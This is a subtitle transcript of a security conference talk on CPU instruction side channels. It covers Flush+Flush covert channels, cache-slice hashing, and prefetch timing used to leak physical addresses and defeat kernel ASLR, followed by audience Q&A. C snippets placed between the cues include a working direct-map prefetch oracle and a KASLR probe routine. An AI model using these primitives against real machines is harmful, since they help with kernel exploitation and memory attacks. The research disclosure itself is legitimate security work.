counters because they do a lot of cache
270
00:25:14,351 --> 00:25:18,549
misses and cache references that happen
when the data is flushed and when you
271
00:25:18,549 --> 00:25:26,090
re-access memory. Now what we thought is:
yeah, but that's not the only kind of
272
00:25:26,090 --> 00:25:31,269
program that leads to lots of cache misses and
cache references, so we would like to have
273
00:25:31,269 --> 00:25:38,120
a slightly better metric. So these cache
attacks they have a very heavy activity on
274
00:25:38,120 --> 00:25:43,840
the cache, but they're also very particular
because they are very short loops of code;
275
00:25:43,840 --> 00:25:48,610
if you take Flush+Reload, this is just
flush one line, reload the line, and then
276
00:25:48,610 --> 00:25:53,750
again flush, reload. That's a very short loop
and that creates a very low pressure on
277
00:25:53,750 --> 00:26:01,490
the instruction TLB, which is kind of
particular for cache attacks. So what we
278
00:26:01,490 --> 00:26:05,380
decided to do is normalize the cache
events, so the cache misses and cache
279
00:26:05,380 --> 00:26:10,720
references by events that have to do with
the instruction TLB and there we could
280
00:26:10,720 --> 00:26:19,360
manage to detect cache attacks and
Rowhammer without having false positives
281
00:26:19,360 --> 00:26:24,510
So this is the metric that I'm going to use
when I talk about stealthiness. So we
282
00:26:24,510 --> 00:26:29,750
started by creating a covert channel. First
we wanted to have it as fast as possible
283
00:26:29,750 --> 00:26:36,160
so we created a protocol to evaluate all
the kinds of cache attacks that we had, so
284
00:26:36,160 --> 00:26:40,540
Flush+Flush, Flush+Reload, and
Prime+Probe, and we started with a
285
00:26:40,540 --> 00:26:47,010
packet size of 28, doesn't really matter.
We measured the capacity of our covert
286
00:26:47,010 --> 00:26:52,799
channel, and Flush+Flush is around
500 kB/s whereas Flush+Reload
287
00:26:52,799 --> 00:26:56,340
was only 300 kB/s
so Flush+Flush is already quite an
288
00:26:56,340 --> 00:27:00,740
improvement on the speed.
Then we measured the stealthiness: at this
289
00:27:00,740 --> 00:27:06,100
speed only Flush+Flush was stealthy, and
now the thing is that Flush+Flush and
290
00:27:06,100 --> 00:27:10,200
Flush+Reload as you've seen there are
some similarities so for a covert channel
291
00:27:10,200 --> 00:27:15,309
they also share the same sender, only the
receiver is different, and for this one the
292
00:27:15,309 --> 00:27:20,000
sender was not stealthy for both of them.
Anyway, if you want a fast covert channel
293
00:27:20,000 --> 00:27:26,640
then just try Flush+Flush, that works.
Now let's try to make it stealthy
294
00:27:26,640 --> 00:27:30,639
completely stealthy, because if the
sender is not stealthy, maybe we
295
00:27:30,639 --> 00:27:36,440
give away the whole attack so we said okay
maybe if we just slow down all the attacks
296
00:27:36,440 --> 00:27:41,240
then there will be less cache hits,
cache misses and then maybe all
297
00:27:41,240 --> 00:27:48,070
the attacks are actually stealthy, why not?
So we tried that: we slowed down everything
298
00:27:48,070 --> 00:27:52,889
so Flush+Reload and Flush+Flush
are around 50 kB/s now
299
00:27:52,889 --> 00:27:55,829
Prime+Probe is a bit slower because it
takes more time
300
00:27:55,829 --> 00:28:01,330
to prime and probe everything, but still
301
00:28:01,330 --> 00:28:09,419
even with this slowdown, only Flush+Flush
has its receiver stealthy, and we also
302
00:28:09,419 --> 00:28:14,769
managed to have the sender stealth now so
basically whether you want a fast covert
303
00:28:14,769 --> 00:28:20,450
channel or a stealth covert channel
Flush+Flush is really great.
304
00:28:20,450 --> 00:28:26,500
Now we wanted to also evaluate if it
wasn't too noisy to perform some side
305
00:28:26,500 --> 00:28:30,740
channel attack so we did these side
channels on the AES t-table implementation
306
00:28:30,740 --> 00:28:35,910
the attacks that we have shown you
earlier, so we computed the number of
307
00:28:35,910 --> 00:28:41,820
encryptions that we needed to determine the
upper four bits of a key byte. So here, the
308
00:28:41,820 --> 00:28:48,870
lower the better the attack, and Flush+Reload
is a bit better, so we need only 250
309
00:28:48,870 --> 00:28:55,029
encryptions to recover these bits but
Flush+Flush comes quite
310
00:28:55,029 --> 00:29:00,570
close with 350 and Prime+Probe is
actually the most noisy of them all, needs
311
00:29:00,570 --> 00:29:06,101
5... close to 5000 encryptions so we have
around the same performance for
312
00:29:06,101 --> 00:29:13,520
Flush+Flush and Flush+Reload.
Now let's evaluate the stealthiness again.
313
00:29:13,520 --> 00:29:19,320
So what we did here is we perform 256
billion encryptions in a synchronous
314
00:29:19,320 --> 00:29:25,740
attack, so we really had the spy and the
victim synchronized, and we evaluated the
315
00:29:25,740 --> 00:29:31,409
stealthiness of them all, and here only
Flush+Flush again is stealthy. And while
316
00:29:31,409 --> 00:29:36,279
you can always slow down a covert channel
you can't actually slow down a side
317
00:29:36,279 --> 00:29:40,700
channel because, in a real-life scenario,
you're not going to say "Hey victim,
318
00:29:40,700 --> 00:29:47,179
wait for me a bit, I am trying to do an
attack here." That won't work.
319
00:29:47,179 --> 00:29:51,429
So there's even more to it but I will need
again a bit of background before
320
00:29:51,429 --> 00:29:56,910
continuing. So I've shown you the
different levels of caches and here I'm
321
00:29:56,910 --> 00:30:04,009
going to focus more on the last-level
cache. So we have here our four slices so
322
00:30:04,009 --> 00:30:09,830
this is the last-level cache and we have
some bits of the address here that
323
00:30:09,830 --> 00:30:14,330
correspond to the set. But more
importantly, we need to know in
324
00:30:14,330 --> 00:30:19,899
which slice an address is going to be.
And that is given by some
325
00:30:19,899 --> 00:30:23,850
bits of the set and the tag of the
address that are passed into a function
326
00:30:23,850 --> 00:30:27,960
that says in which slice the line is going
to be.
327
00:30:27,960 --> 00:30:32,460
Now the thing is that this hash function
is undocumented by Intel. Wouldn't be fun
328
00:30:32,460 --> 00:30:39,250
otherwise. So we have this: As many slices
as cores, an undocumented hash function
329
00:30:39,250 --> 00:30:43,980
that maps a physical address to a slice,
and while it's actually a bit of a pain
330
00:30:43,980 --> 00:30:48,710
for attacks, it was not designed
for security originally but for
331
00:30:48,710 --> 00:30:53,570
performance, because you want all the
access to be evenly distributed in the
332
00:30:53,570 --> 00:31:00,399
different slices, for performance reasons.
So what the hash function basically does: it
333
00:31:00,399 --> 00:31:05,279
takes some bits of the physical address
and outputs k bits of slice, so just one
334
00:31:05,279 --> 00:31:09,309
bit if you have a two-core machine, two
bits if you have a four-core machine and
335
00:31:09,309 --> 00:31:16,830
so on. Now let's go back to clflush and see
what's the relation with that.
336
00:31:16,830 --> 00:31:21,169
So the thing that we noticed is that
clflush is actually faster when the line is
337
00:31:21,169 --> 00:31:28,549
on the local slice.
So if you're flushing always
338
00:31:28,549 --> 00:31:33,340
one line and you run your program on core
zero, core one, core two and core three,
339
00:31:33,340 --> 00:31:37,899
you will observe that on one core in
particular, when you run the program on
340
00:31:37,899 --> 00:31:44,632
one core, the clflush is faster. And so
here this is on core one, and you can see
341
00:31:44,632 --> 00:31:51,139
that on cores zero, two, and three it's
a bit slower and here we can deduce that,
342
00:31:51,139 --> 00:31:55,320
so we run the program on core one and we
flush always the same line and we can
343
00:31:55,320 --> 00:32:01,850
deduce that the line belongs to slice one.
And what we can do with that is that we
344
00:32:01,850 --> 00:32:06,500
can map physical addresses to slices.
And that's one way to reverse-engineer
345
00:32:06,500 --> 00:32:10,639
this addressing function that was not
documented.
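The recovered functions turn out to be XORs of physical address bits. As a sketch, computing a slice index as the parity of masked address bits looks like this; the masks are purely illustrative placeholders, not the actual reverse-engineered per-CPU functions:

```c
#include <stdint.h>

/* Parity (XOR) of all set bits in a 64-bit word. */
static inline unsigned parity64(uint64_t x)
{
    return (unsigned)__builtin_parityll(x);
}

/* Two hash output bits give the slice index on a four-core part.
 * Each output bit is the XOR of a (CPU-specific) subset of the
 * physical address bits, selected here by a caller-supplied mask. */
static unsigned slice_index(uint64_t paddr,
                            uint64_t mask_bit0, uint64_t mask_bit1)
{
    return (parity64(paddr & mask_bit1) << 1)
         |  parity64(paddr & mask_bit0);
}
```

With the real masks plugged in, observing which core flushes a line fastest (as above) gives one (address, slice) pair per measured line, and enough pairs pin down the masks.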
346
00:32:10,639 --> 00:32:15,880
Funnily enough that's not the only way:
What I did before that was using the
347
00:32:15,880 --> 00:32:21,229
performance counters to reverse-engineer
this function, but that's actually a whole
348
00:32:21,229 --> 00:32:27,770
other story and if you want more detail on
that, there's also an article on that.
349
00:32:27,770 --> 00:32:30,139
ML: So the next instruction we want to
350
00:32:30,139 --> 00:32:35,110
talk about is the prefetch instruction.
And the prefetch instruction is used to
351
00:32:35,110 --> 00:32:40,841
tell the CPU: "Okay, please load the data
I need later on, into the cache, if you
352
00:32:40,841 --> 00:32:45,968
have some time." And in the end there are
actually six different prefetch
353
00:32:45,968 --> 00:32:52,929
instructions: prefetcht0 to t2 which
means: "CPU, please load the data into the
354
00:32:52,929 --> 00:32:58,640
first-level cache", or in the last-level
cache, whatever you want to use, but we
355
00:32:58,640 --> 00:33:02,250
spare you the details because it's not so
interesting in the end.
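For reference, the hint variants are exposed through compiler intrinsics roughly like this (a sketch; the write-prefetch forms prefetchw/prefetchwt1 are not shown):

```c
#include <x86intrin.h>  /* _mm_prefetch and the _MM_HINT_* constants */

/* Issue each data-prefetch hint for one address. t0/t1/t2 target
 * progressively outer cache levels, nta asks for non-temporal
 * (streaming) placement. All of them are only hints to the CPU. */
static void prefetch_all_hints(const char *p)
{
    _mm_prefetch(p, _MM_HINT_T0);   /* into all levels, incl. L1 */
    _mm_prefetch(p, _MM_HINT_T1);
    _mm_prefetch(p, _MM_HINT_T2);
    _mm_prefetch(p, _MM_HINT_NTA);  /* minimize cache pollution */
}
```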
356
00:33:02,250 --> 00:33:06,940
However, what's more interesting is when
we take a look at the Intel manual and
357
00:33:06,940 --> 00:33:11,880
what it says there. So, "Using the
PREFETCH instruction is recommended only
358
00:33:11,880 --> 00:33:17,049
if data does not fit in the cache." So you
can tell the CPU: "Please load data I want
359
00:33:17,049 --> 00:33:23,210
to stream into the cache, so it's more
performant." "Use of software prefetch
360
00:33:23,210 --> 00:33:27,740
should be limited to memory addresses that
are managed or owned within the
361
00:33:27,740 --> 00:33:33,620
application context."
So one might wonder what happens if this
362
00:33:33,620 --> 00:33:40,940
address is not managed by myself. Sounds
interesting. "Prefetching to addresses
363
00:33:40,940 --> 00:33:46,289
that are not mapped to physical pages can
experience non-deterministic performance
364
00:33:46,289 --> 00:33:52,030
penalty. For example specifying a NULL
pointer as an address for prefetch can
365
00:33:52,030 --> 00:33:56,000
cause long delays."
So we don't want to do that because our
366
00:33:56,000 --> 00:34:02,919
program will be slow. So, let's take a
look what they mean with non-deterministic
367
00:34:02,919 --> 00:34:08,889
performance penalty, because we want to
write good software, right? But before
368
00:34:08,889 --> 00:34:12,510
that, we have to take a look at a little
bit more background information to
369
00:34:12,510 --> 00:34:17,710
understand the attacks.
So on modern operating systems, every
370
00:34:17,710 --> 00:34:22,850
application has its own virtual address
space. So at some point, the CPU needs to
371
00:34:22,850 --> 00:34:27,479
translate these addresses to the physical
addresses actually in the DRAM. And for
372
00:34:27,479 --> 00:34:33,690
that we have this very complex-looking
data structure. So we have a 48-bit
373
00:34:33,690 --> 00:34:40,409
virtual address, and some of those bits
map to a table, like the page map level 4
374
00:34:40,409 --> 00:34:47,760
table, with 512 entries, so depending on
those bits the CPU knows at which entry it
375
00:34:47,760 --> 00:34:51,520
has to look.
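The index extraction just described is plain bit arithmetic over the 48-bit virtual address; as a sketch:

```c
#include <stdint.h>

/* Split a 48-bit x86-64 virtual address into the four 9-bit table
 * indices (512 entries per table) and the 12-bit page offset used
 * by 4-level translation with 4-kilobyte pages. */
static inline unsigned pml4_index(uint64_t va)  { return (va >> 39) & 0x1ff; }
static inline unsigned pdpt_index(uint64_t va)  { return (va >> 30) & 0x1ff; }
static inline unsigned pd_index(uint64_t va)    { return (va >> 21) & 0x1ff; }
static inline unsigned pt_index(uint64_t va)    { return (va >> 12) & 0x1ff; }
static inline unsigned page_offset(uint64_t va) { return va & 0xfff; }
```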
And if there is data there, because the
376
00:34:51,520 --> 00:34:56,900
address is mapped, it can proceed and look
at the page directory pointer table,
377
00:34:56,900 --> 00:35:04,620
and so on further down. Everything
is the same for each level until you come
378
00:35:04,620 --> 00:35:09,130
to your page table, where you have
4-kilobyte pages. So it's in the end not
379
00:35:09,130 --> 00:35:13,851
that complicated, but it's a bit
confusing, because you want to know a
380
00:35:13,851 --> 00:35:20,310
physical address, so you have to look it
up somewhere in the main memory
381
00:35:20,310 --> 00:35:25,420
with physical addresses to translate your
virtual addresses. And if you have to go
382
00:35:25,420 --> 00:35:31,890
through all those levels, it needs a long
time, so we can do better than that and
383
00:35:31,890 --> 00:35:39,160
that's why Intel introduced additional
caches, also for all of those levels. So,
384
00:35:39,160 --> 00:35:45,560
if you want to translate an address, you
take a look at the ITLB for instructions,
385
00:35:45,560 --> 00:35:51,150
and the data TLB for data. If it's there,
you can stop, otherwise you go down all
386
00:35:51,150 --> 00:35:58,700
those levels and if it's not in any cache
you have to look it up in the DRAM. In
387
00:35:58,700 --> 00:36:03,300
addition, the address space you have is
shared, because you have, on the one hand,
388
00:36:03,300 --> 00:36:07,470
the user memory and, on the other hand,
you have mapped the kernel for convenience
389
00:36:07,470 --> 00:36:12,870
and performance also in the address space.
And if your user program wants to access
390
00:36:12,870 --> 00:36:18,310
some kernel functionality like reading a
file, it will switch to the kernel memory
391
00:36:18,310 --> 00:36:23,880
there's a privilege escalation, and then
you can read the file, and so on. So,
392
00:36:23,880 --> 00:36:30,420
that's it. However, you have drivers in
the kernel, and if you know the addresses
393
00:36:30,420 --> 00:36:35,771
of those drivers, you can do code-reuse
attacks, and as a countermeasure, they
394
00:36:35,771 --> 00:36:40,150
introduced address-space layout
randomization, also for the kernel.
395
00:36:40,150 --> 00:36:47,040
And this means that when you have your
program running, the kernel is mapped at
396
00:36:47,040 --> 00:36:51,630
one address and if you reboot the machine
it's not on the same address anymore but
397
00:36:51,630 --> 00:36:58,390
somewhere else. So if there is a way to
find out at which address the kernel is
398
00:36:58,390 --> 00:37:04,450
loaded, you have circumvented this
countermeasure and defeated kernel address
399
00:37:04,450 --> 00:37:11,060
space layout randomization. So this would
be nice for some attacks. In addition,
400
00:37:11,060 --> 00:37:16,947
there's also the kernel direct physical
map. And what does this mean? It's
401
00:37:16,947 --> 00:37:23,320
implemented on many operating systems like
OS X, Linux, also on the Xen hypervisor
402
00:37:23,320 --> 00:37:27,860
and BSD, but not on Windows. But what it means
403
00:37:27,860 --> 00:37:33,870
is that the complete physical memory is
mapped additionally in the kernel
404
00:37:33,870 --> 00:37:40,460
memory at a fixed offset. So, for every
page that is mapped in the user space,
405
00:37:40,460 --> 00:37:45,160
there's something like a twin page in the
kernel memory, which you can't access
406
00:37:45,160 --> 00:37:50,371
because it's in the kernel memory.
However, we will need it later, because
407
00:37:50,371 --> 00:37:58,230
now we go back to prefetch and see what we
can do with that. So, prefetch is not a
408
00:37:58,230 --> 00:38:04,150
usual instruction, because it just tells
the CPU "I might need that data later on.
409
00:38:04,150 --> 00:38:10,000
If you have time, load it for me," if not,
the CPU can ignore it because it's busy
410
00:38:10,000 --> 00:38:15,810
with other stuff. So, there's no guarantee
that this instruction is really executed,
411
00:38:15,810 --> 00:38:22,070
but most of the time it is. And a nice,
interesting thing is that it generates no
412
00:38:22,070 --> 00:38:29,000
faults, so whatever you pass to this
instruction, your program won't crash, and
413
00:38:29,000 --> 00:38:33,990
it does not check any privileges, so I can
also pass a kernel address to it and it
414
00:38:33,990 --> 00:38:37,510
won't say "No, stop, you accessed an
address that you are not allowed to
415
00:38:37,510 --> 00:38:45,530
access, so I crash," it just continues,
which is nice.
416
00:38:45,530 --> 00:38:49,810
The second interesting thing is that the
operand is a virtual address, so every
417
00:38:49,810 --> 00:38:55,534
time you execute this instruction, the CPU
has to go and check "OK, what physical
418
00:38:55,534 --> 00:38:59,600
address does this virtual address
correspond to?" So it has to do the lookup
419
00:38:59,600 --> 00:39:05,750
with all those tables we've seen earlier,
and as you probably have guessed already,
420
00:39:05,750 --> 00:39:10,370
the execution time varies also for the
prefetch instruction and we will see later
421
00:39:10,370 --> 00:39:16,090
on what we can do with that.
So, let's get back to the direct physical
422
00:39:16,090 --> 00:39:22,870
map. Because we can create an oracle for
address translation, so we can find out
423
00:39:22,870 --> 00:39:27,540
what physical address belongs to the
virtual address. Because nowadays you
424
00:39:27,540 --> 00:39:31,990
don't want the user to know, because
you can craft nice rowhammer attacks with
425
00:39:31,990 --> 00:39:37,520
that information, and more advanced cache
attacks, so you restrict this information
426
00:39:37,520 --> 00:39:44,270
to the user. But let's check if we find a
way to still get this information. So, as
427
00:39:44,270 --> 00:39:50,150
I've told you earlier, if you have a
page mapped in the user space,
428
00:39:50,150 --> 00:39:54,505
you have the twin page in the kernel
space, and if it's cached,
429
00:39:54,505 --> 00:39:56,710
it's cached for both of them again.
430
00:39:56,710 --> 00:40:03,170
So, the attack now works as the following:
As the attacker, you flush your user
431
00:40:03,170 --> 00:40:09,760
space page, so it's not in the cache for
the... also for the kernel memory, and
432
00:40:09,760 --> 00:40:15,850
then you call prefetch on the address of
the kernel, because as I told you, you
433
00:40:15,850 --> 00:40:22,050
still can do that because it doesn't
create any faults. So, you tell the CPU
434
00:40:22,050 --> 00:40:28,310
"Please load me this data into the cache
even if I don't have access to this data
435
00:40:28,310 --> 00:40:32,550
normally."
And if we now measure on our user space
436
00:40:32,550 --> 00:40:37,100
page the address again, and we measure a
cache hit, because it has been loaded by
437
00:40:37,100 --> 00:40:42,630
the CPU into the cache, we know exactly
which kernel address, since we passed that
438
00:40:42,630 --> 00:40:48,250
address to the instruction, this page
corresponds to. And because this is at a
439
00:40:48,250 --> 00:40:53,280
fixed offset, we can just do a simple
subtraction and know the physical address
440
00:40:53,280 --> 00:40:59,180
again. So we have a nice way to find
physical addresses for virtual addresses.
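The oracle loop just described can be sketched as follows. The direct-map base shown is the traditional Linux x86_64 value, and the threshold is an assumption for illustration; both vary across systems:

```c
#include <stdint.h>
#include <x86intrin.h>  /* __rdtscp, _mm_clflush, _mm_prefetch, _mm_mfence */

/* Start of the kernel's direct physical map (illustrative; the
 * classic Linux x86_64 value, may be randomized on newer kernels). */
#define DIRECT_MAP_BASE 0xffff880000000000ULL

/* Time a reload of a user-space address: fast if it is cached. */
static inline uint64_t reload_time(volatile char *p)
{
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

/* One oracle round for one physical-address guess: flush the user
 * copy, prefetch the (inaccessible, non-faulting) direct-map twin,
 * then time a reload of the user copy. A cache hit means the twin
 * maps the same physical page as our user page. */
static int candidate_matches(volatile char *user_page,
                             uint64_t paddr_guess, uint64_t threshold)
{
    _mm_clflush((void *)user_page);
    _mm_mfence();
    _mm_prefetch((char *)(DIRECT_MAP_BASE + paddr_guess), _MM_HINT_T0);
    return reload_time(user_page) < threshold;  /* hit => match */
}
```

Iterating the guess over physical memory and subtracting DIRECT_MAP_BASE from the first matching twin address yields the physical address, exactly the plot shown in the talk.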
441
00:40:59,180 --> 00:41:04,390
And in practice this looks like this
following plot. So, it's pretty simple,
442
00:41:04,390 --> 00:41:08,910
because we just do this for every address,
and at some point we measure a cache hit.
443
00:41:08,910 --> 00:41:14,260
So, there's a huge difference. And exactly
at this point we know this physical
444
00:41:14,260 --> 00:41:20,140
address corresponds to our virtual
address. The second thing is that we can
445
00:41:20,140 --> 00:41:27,070
exploit the timing differences it needs
for the prefetch instruction. Because, as
446
00:41:27,070 --> 00:41:31,850
I told you, when you go down these cache
levels, at some point you see "it's here"
447
00:41:31,850 --> 00:41:37,500
or "it's not here," so it can abort early.
And with that we can know exactly
448
00:41:37,500 --> 00:41:41,800
when the prefetch
instruction aborted, and know how the
449
00:41:41,800 --> 00:41:48,070
pages are mapped into the address space.
So, the timing depends on where the
450
00:41:48,070 --> 00:41:57,090
translation stops. And using those two
properties and those information, we can
451
00:41:57,090 --> 00:42:02,227
do the following: On the one hand, we can
build variants of cache attacks. So,
452
00:42:02,227 --> 00:42:07,444
instead of Flush+Reload, we can do
Flush+Prefetch, for instance. We can
453
00:42:07,444 --> 00:42:12,060
also use prefetch to mount rowhammer
attacks on privileged addresses, because
454
00:42:12,060 --> 00:42:18,069
it doesn't generate any faults when we pass
those addresses, and it works as well. In
455
00:42:18,069 --> 00:42:23,330
addition, we can use it to recover the
translation levels of a process, which you
456
00:42:23,330 --> 00:42:27,870
could do earlier with the pagemap file,
but as I told you it's now privileged, so
457
00:42:27,870 --> 00:42:32,890
you don't have access to that, and by
doing that you can bypass address space
458
00:42:32,890 --> 00:42:38,170
layout randomization. In addition, as I
told you, you can translate virtual
459
00:42:38,170 --> 00:42:43,530
addresses to physical addresses, which is
now also privileged with the pagemap
460
00:42:43,530 --> 00:42:48,790
file, and using that it re-enables ret2dir
exploits, which have been
461
00:42:48,790 --> 00:42:55,550
demonstrated last year. On top of that, we
can also use this to locate kernel
462
00:42:55,550 --> 00:43:00,850
drivers, as I told you. It would be nice
if we can circumvent KSLR as well, and I
463
00:43:00,850 --> 00:43:08,380
will show you now how this is possible.
So, with the first oracle we find out all
464
00:43:08,380 --> 00:43:15,430
the pages that are mapped, and for each of
those pages, we evict the translation
465
00:43:15,430 --> 00:43:18,210
caches, and we can do that by either
calling sleep,
466
00:43:18,210 --> 00:43:24,450
which schedules another program, or access
just a large memory buffer. Then, we
467
00:43:24,450 --> 00:43:28,260
perform a syscall to the driver. So,
there's code of the driver executed and
468
00:43:28,260 --> 00:43:33,540
loaded into the cache, and then we just
measure the time prefetch takes on this
469
00:43:33,540 --> 00:43:40,840
address. And in the end, the fastest
average access time is the driver page.
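One probe round of this KASLR attack might look like the following sketch; the getpid syscall and the sleep interval stand in for whichever driver call and eviction strategy the attacker chooses:

```c
#include <stdint.h>
#include <unistd.h>     /* usleep, getpid */
#include <x86intrin.h>  /* __rdtscp, _mm_prefetch, _mm_mfence */

/* Time a single prefetch: the translation aborts at different levels
 * depending on how much of the candidate address is mapped, so the
 * fastest average time over many rounds marks the driver page. */
static inline uint64_t prefetch_time(uintptr_t addr)
{
    unsigned aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    _mm_prefetch((char *)addr, _MM_HINT_T2);
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

/* One probe round for one candidate kernel address: evict the
 * translation caches (here by sleeping, which schedules other code),
 * run kernel code via a syscall so it is cached, then measure. */
static uint64_t probe_candidate(uintptr_t candidate)
{
    usleep(1000);
    (void)getpid();
    return prefetch_time(candidate);
}
```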
470
00:43:40,840 --> 00:43:46,770
So, we can mount this attack on Windows 10
in less than 12 seconds. So, we can defeat
471
00:43:46,770 --> 00:43:52,110
KASLR in less than 12 seconds, which is
very nice. And in practice, the
472
00:43:52,110 --> 00:43:58,330
measurements look like the following: So,
we have a lot of long measurements, and at
473
00:43:58,330 --> 00:44:05,060
some point you have a low one, and you
know exactly that this is the driver region and
474
00:44:05,060 --> 00:44:09,930
the address where the driver is located. And
you can mount those ret2dir
475
00:44:09,930 --> 00:44:16,210
attacks again. However, that's not
everything, because there are more
476
00:44:16,210 --> 00:44:20,795
instructions in Intel.
CM: Yeah, so, the following is not our
477
00:44:20,795 --> 00:44:24,350
work, but we thought that would be
interesting, because it's basically more
478
00:44:24,350 --> 00:44:30,740
instructions, more attacks, more fun. So
there's the RDSEED instruction, and what
479
00:44:30,740 --> 00:44:35,340
it does is request a random seed from
the hardware random number generator. So,
480
00:44:35,340 --> 00:44:39,310
the thing is that there is a fixed number
of precomputed random bits, and that takes
481
00:44:39,310 --> 00:44:44,320
time to regenerate them. So, as everything
that takes time, you can create a covert
482
00:44:44,320 --> 00:44:50,180
channel with that. There is also FADD and
FMUL, which are floating point operations.
483
00:44:50,180 --> 00:44:56,740
Here, the running time of this instruction
depends on the operands. Some people
484
00:44:56,740 --> 00:45:01,530
managed to bypass Firefox's same origin
policy with an SVG filter timing attack
485
00:45:01,530 --> 00:45:08,540
with that. There's also the JMP
instructions. So, in modern CPUs you have
486
00:45:08,540 --> 00:45:14,520
branch prediction, and branch target
prediction. With that, it's actually been
487
00:45:14,520 --> 00:45:18,250
studied a lot, you can create a covert
channel. You can do side-channel attacks
488
00:45:18,250 --> 00:45:26,028
on crypto. You can also bypass KASLR, and
finally, there are TSX instructions, which
489
00:45:26,028 --> 00:45:31,010
is an extension for hardware transactional
memory support, which has also been used
490
00:45:31,010 --> 00:45:37,150
to bypass KASLR. So, in case you're not
sure, KASLR is dead. You have lots of
491
00:45:37,150 --> 00:45:45,650
different things to read. Okay, so, on to
the conclusion now. So, as you've seen, it's
492
00:45:45,650 --> 00:45:50,190
actually more a problem of CPU design,
than really the instruction set
493
00:45:50,190 --> 00:45:55,720
architecture. The thing is that all these
issues are really hard to patch. They
494
00:45:55,720 --> 00:45:59,966
are all linked to performance
optimizations, and we are not getting rid
495
00:45:59,966 --> 00:46:03,890
of performance optimization. That's
basically a trade-off between performance
496
00:46:03,890 --> 00:46:11,530
and security, and performance seems to
always win. There have been some
497
00:46:11,530 --> 00:46:20,922
propositions against cache attacks,
like, let's say, removing the clflush
498
00:46:20,922 --> 00:46:26,640
instruction. The thing is that all these
quick fixes won't work, because we always
499
00:46:26,640 --> 00:46:31,450
find new ways to do the same thing without
these precise instructions and also, we
500
00:46:31,450 --> 00:46:37,410
keep finding new instructions that leak
information. So, it's really, let's say
501
00:46:37,410 --> 00:46:43,740
quite a big topic that we have to fix
this. So, thank you very much for your
502
00:46:43,740 --> 00:46:47,046
attention. If you have any questions we'd
be happy to answer them.
503
00:46:47,046 --> 00:46:52,728
applause
504
00:46:52,728 --> 00:47:01,510
applause
Herald: Okay. Thank you very much again
505
00:47:01,510 --> 00:47:06,571
for your talk, and now we will have a Q&A,
and we have, I think, about 15 minutes, so
506
00:47:06,571 --> 00:47:11,330
you can start lining up behind the
microphones. They are in the gangways in
507
00:47:11,330 --> 00:47:18,130
the middle. Except, I think that one...
oh, no, it's back up, so it will work. And
508
00:47:18,130 --> 00:47:22,180
while we wait, I think we will take
questions from our signal angel, if there
509
00:47:22,180 --> 00:47:28,810
are any. Okay, there aren't any, so...
microphone questions. I think, you in
510
00:47:28,810 --> 00:47:33,440
front.
Microphone: Hi. Can you hear me?
511
00:47:33,440 --> 00:47:40,050
Herald: Try again.
Microphone: Okay. Can you hear me now?
512
00:47:40,050 --> 00:47:46,480
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that
513
00:47:46,480 --> 00:47:51,310
you can't distinguish it from a normal
process, or...?
514
00:47:51,310 --> 00:47:56,500
CM: So...
Herald: Wait a second. We have still Q&A,
515
00:47:56,500 --> 00:47:59,780
so could you quiet down a bit? That would
be nice.
516
00:47:59,780 --> 00:48:08,180
CM: So, the question was about the
stealthiness metric. Basically, we use the
517
00:48:08,180 --> 00:48:14,320
metric with cache misses and cache
references, normalized by the instruction
518
00:48:14,320 --> 00:48:21,080
TLB events, and we
just found the threshold under which
519
00:48:21,080 --> 00:48:25,820
pretty much every benign application was
below this, and rowhammer and cache
520
00:48:25,820 --> 00:48:30,520
attacks were above it. So we fixed the
threshold, basically.
521
00:48:30,520 --> 00:48:35,520
H: That microphone.
Microphone: Hello. Thanks for your talk.
522
00:48:35,520 --> 00:48:42,760
It was great. First question: Did you
inform Intel before doing this talk?
523
00:48:42,760 --> 00:48:47,520
CM: Nope.
Microphone: Okay. The second question:
524
00:48:47,520 --> 00:48:51,050
What's your future plans?
CM: Sorry?
525
00:48:51,050 --> 00:48:55,780
M: What's your future plans?
CM: Ah, future plans. Well, what I did,
526
00:48:55,780 --> 00:49:01,220
that is interesting, is that we keep
finding these more or less by accident, or
527
00:49:01,220 --> 00:49:06,440
manually, so having a good idea of what's
the attack surface here would be a good
528
00:49:06,440 --> 00:49:10,050
thing, and doing that automatically would
be even better.
529
00:49:10,050 --> 00:49:14,170
M: Great, thanks.
H: Okay, the microphone in the back,
530
00:49:14,170 --> 00:49:18,770
over there. The guy in white.
M: Hi. One question. If you have,
531
00:49:18,770 --> 00:49:24,410
like, a daemon, that randomly invalidates
some cache lines, would that be a better
532
00:49:24,410 --> 00:49:31,120
countermeasure than disabling the caches?
ML: What was the question?
533
00:49:31,120 --> 00:49:39,580
CM: If invalidating cache lines would be
better than disabling the whole cache. So,
534
00:49:39,580 --> 00:49:42,680
I'm...
ML: If you know which cache lines have
535
00:49:42,680 --> 00:49:47,300
been accessed by the process, you can
invalidate those cache lines before you
536
00:49:47,300 --> 00:49:52,820
swap those processes, but it's also a
trade-off between performance. Like, you
537
00:49:52,820 --> 00:49:57,940
can also, if you switch processes, flush
the whole cache, and then it's empty, and
538
00:49:57,940 --> 00:50:01,900
then you don't see any activity anymore,
but there's also the trade-off of
539
00:50:01,900 --> 00:50:07,510
performance with this.
M: Okay, maybe a second question. If you,
540
00:50:07,510 --> 00:50:12,240
there are some ARM architectures
that have random cache line invalidations.
541
00:50:12,240 --> 00:50:16,010
Did you try those, if you can see a
[unintelligible] channel there.
542
00:50:16,010 --> 00:50:21,960
ML: If they're truly random, but probably
you just have to make more measurements
543
00:50:21,960 --> 00:50:27,180
and more measurements, and then you can
average out the noise, and then you can do
544
00:50:27,180 --> 00:50:30,350
these attacks again. It's like, with prime
and probe, where you need more
545
00:50:30,350 --> 00:50:34,080
measurements, because it's much more
noisy, so in the end you will just need
546
00:50:34,080 --> 00:50:37,870
much more measurements.
CM: So, on ARM, it's supposed to be pretty
547
00:50:37,870 --> 00:50:43,260
random. At least it's in the manual, but
we actually found nice ways to evict cache
548
00:50:43,260 --> 00:50:47,230
lines, that we really wanted to evict, so
it's not actually that pseudo-random.
549
00:50:47,230 --> 00:50:51,960
So, even... let's say, if something is
truly random, it might be nice, but then
550
00:50:51,960 --> 00:50:57,170
it's also quite complicated to implement.
I mean, you probably don't want a random
551
00:50:57,170 --> 00:51:01,480
number generator just for the cache.
M: Okay. Thanks.
552
00:51:01,480 --> 00:51:05,980
H: Okay, and then the three guys here on
the microphone in the front.
553
